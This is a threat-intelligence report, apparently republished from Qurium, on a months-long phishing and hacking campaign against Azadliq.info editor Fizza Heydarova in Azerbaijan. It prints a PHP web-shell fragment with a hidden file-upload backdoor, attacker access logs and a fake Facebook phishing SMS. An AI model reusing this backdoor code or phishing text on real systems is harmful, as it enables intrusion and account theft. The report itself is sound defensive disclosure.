Targeted sophisticated phishing attacks against dissidents in Azerbaijan is trending

During the past year Qurium has recorded an increase of targeted phishing attacks against against independent media and human rights activists in Azerbaijan. The attacks are launched from infrastructure in the country with total impunity.

The story of Fizza Eydarova, editor of Azadliq.info, is an example of how phishing attacks against regime critical journalists and human rights defenders in Azerbaijan are getting more targeted and sophisticated. Additionally, phishing attacks are being launched from IP space belonging to AzerTelecom, one of the country’s largest Internet provider, with total impunity.

The attacker targeting Fizza used several attack vectors and managed to compromise her Gmail account, and gain access to her WordPress account with Azadliq.info. In an attempt to ensure persistent access to the website, the attacker installed multiple backdoors on the site. However, all attempts to access the backdoors were blocked by Qurium, hosting provider of Azadliq.
The attacker also carried out multiple attempts to compromise Fizza’s Facebook account, including sending fake SMS impersonating Facebook redirecting her to a fake Facebook login page.

The number of attack vectors used, and the fact that the attacks were carried out during several months’ time, shows a certain level of dedication and determination.  The attacks have been carried out from IP address 134{.}19.217.249, which is the same IP address used to launch attacks against other independent media in Azerbaijan in the past, including Qurium’s core infrastructure.

This report summarizes the case of Fizza Heydarov, editor of Azadliq.info, one of the multiple cases we have investigated.


The 22nd of April 2019, Fizza Heydarov editor of Azadliq (Azadlıq Qəzeti) reported:

“During my two years on Facebook, I haven’t had any special activity. I liked what my friends wrote, and I rarely wrote anything. Today my account has been hacked twice and my password has been changed. In both cases, I managed to recover it.”

Fizza reports on Facebook that her account has been hacked.

In April 2019, Fizza received a warning by Facebook that the account was being accessed from the IP address 134{.}19.217.249 from AzerTelecom.

Warning from Facebook, access from unknown IP address.

The attacker had gained access to Fizza’s Gmail account and was resetting the password of her Facebook account. Once the attacker accessed the account, he tried to change the recovery e-mail to fizze.heyderova.16{@}bk.ru.

The attacker enters azadliq.info website

With access to the editor’s Gmail account, the attacker searches the inbox and finds a mail containing the credentials to Azadliq.info’s website. The 23rd of April 2019, the attacker accessed the admin area of the website using a Tor exit with IP address 65{.}19.167.132.

"65.19.167.132" "" "-" "23/Apr/2019:10:08:28 +0000" "1556014108.286" "GET" "/rightxxxx"  "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"

Soon after, the attacker installs a backdoor on the website. He steals the code from an old backdoor of 2017 from the defacer “Aissa Wolf1200”.

set_time_limit(0);
error_reporting(0);
if(isset($_GET["rhs334"])){echo"<center></center></enter><font color=black></font>".php_uname()."";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}

if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>index.php</title>
<style>
body{
    font-family: "orbitron";
    background-color: #e6e6e6;
    text-shadow:0px 0px 1px #757575;
}


The attacker installs another backdoor in the system, obfuscated using FOPO (Free Online PHP Obfuscator). He downloads the code from exploit.com.

The attacker does not notice that the “Shell” he downloaded from exploit.com is already backdoored by the author “byhero44”. A full description of this “backdoored backdoor” can be found here.

By the 23rd of April 2019, the attacker had installed two backdoors into Azadliq’s website. The code from both of them was found in public forums and one of them was obfuscated and backdoored by the author.

The 8th of May 2019, the attacker edits the WordPress theme to try to steal the passwords of the website. He connects to the backdoor using Tor browser.

"185.220.102.7" "08/May/2019:12:52:59 +0000" "GET" "/wp-admin/plugins.php?_wpnonce=96f78b228f&action=activate&plugin=wp-file-manager/file_folder_manager.php" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"

As Qurium blocks his attempt, he tries to connect again using UltraVPN.

161.129.70.190" "08/May/2019:13:08:04 +0000" "1557320884.848" "GET" "/" "https://www.azadliq.info/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"

Qurium blocked multiple attempts coming from different VPNs until the attacker dropped his VPN connection from 161{.}129.70.190 and reconnected from 134{.}19.217.249, the same IP from AzerTelecom that tried to access Fizza’s Facebook account.

Waiting for the return of the attacker

For weeks, no further attempts were made by the attacker to access the backdoors planted on Azadliq’s website, until the 31st of May 2019, when he tried to reach his hidden backdoors using a Tor exit hosted at M247 Ltd.

"195.206.105.217" "31/May/2019:15:16:01 +0000"  "GET" "/wp-content/uploads/2015/12/a.txt?id=randdaoma" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0" 
"195.206.105.217" "31/May/2019:15:16:15 +0000" "GET" "/wp-content/uploads/2015/12/a.txt?" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"  

Noticing that the backdoor was not working, the attacker returns the 6th of June using Windscribe VPN 142{.}44.173.129.

Never give up!

The attacker is patient and determined not to give up despite his failure to access the hidden backdoors he installed. He changes strategy and initiates another round of phishing attack. This time he sends a direct “SMS” message to Fizza, looking as it is coming from Facebook. For now, we ignore how the attacker faked the SMS Sender, making it look like it is coming from Facebook.

“Someone logged into your Facebook account. Please renew your password at this link if it was not you: https:// bit. ly/ 2jjbxnc

The link redirected to a fake Facebook login page.

Fake Facebook login page.

The Bit.ly service provides interesting information about the short link it creates. We investigated the path “2Jjbxnc” and got some interesting info.

The link was created on May 7th 2019 but no activity started until May 19th. Fizza received the phishing attempt on May 23rd. Judging by the amounts of clicks, the link was probably sent to several victims.

On the website https://www.itdib.az, the attacker placed a fake Facebook login page inside the writable folder .well-known, a folder used by Let’s encrypt to provision new SSL certificates.

What is itdib.az?

Itdib in Azerbaijan is an initiative for public information support for public initiatives run by Cesaret Huseynzade. The initiative provided free hosting space to several NGOs in Azerbaijan on the IP address: 77{.}245.159.55

Another attempt…

In June 2019, the attacker tries to gain access to Fizza’s Telegram account using a IPv6 Tor exit.

What do we know of 134{.}19.217.249?

The phishing attacks are not the only attacks coming from this IP address. In the past years we have recorded the following attempts from the same IP address:

2018/10: Acunetix scan against azadliq.info
2018/11: Web Flood against cumhuriyyet.net
2019/12: Vulnerability scan against meydan.tv
2020/02: Bruteforce attempts against Qurium services: FTP/IMAP/POP
 

In 2020, the IP address remains active and has performed subdomain brute forcing against azadliq.info and meydan.tv to find non-public services of these organizations.

The “.249” IP address hosts a Mikrotik router in a network inside AzerTelecom with very little public services.

According to Censys.ip, the network hosts 9 surveillance cameras from the same vendor Hikvision in addresses:

134.19.217{.}136
134.19.217{.}140
134.19.217{.}142
134.19.217{.}155
134.19.217{.}164 x
134.19.217{.}174
134.19.217{.}45
134.19.217{.}63 x
134.19.217{.}92

In August 2019, the same IP address involved in the phishing attack against Fizza (134{.}19.217.249) edits the Wikipedia page of Vilayət Eyvazov, Ministry of Interior of Azerbaijan.

Published with the permission of https://www.qurium.org/

Source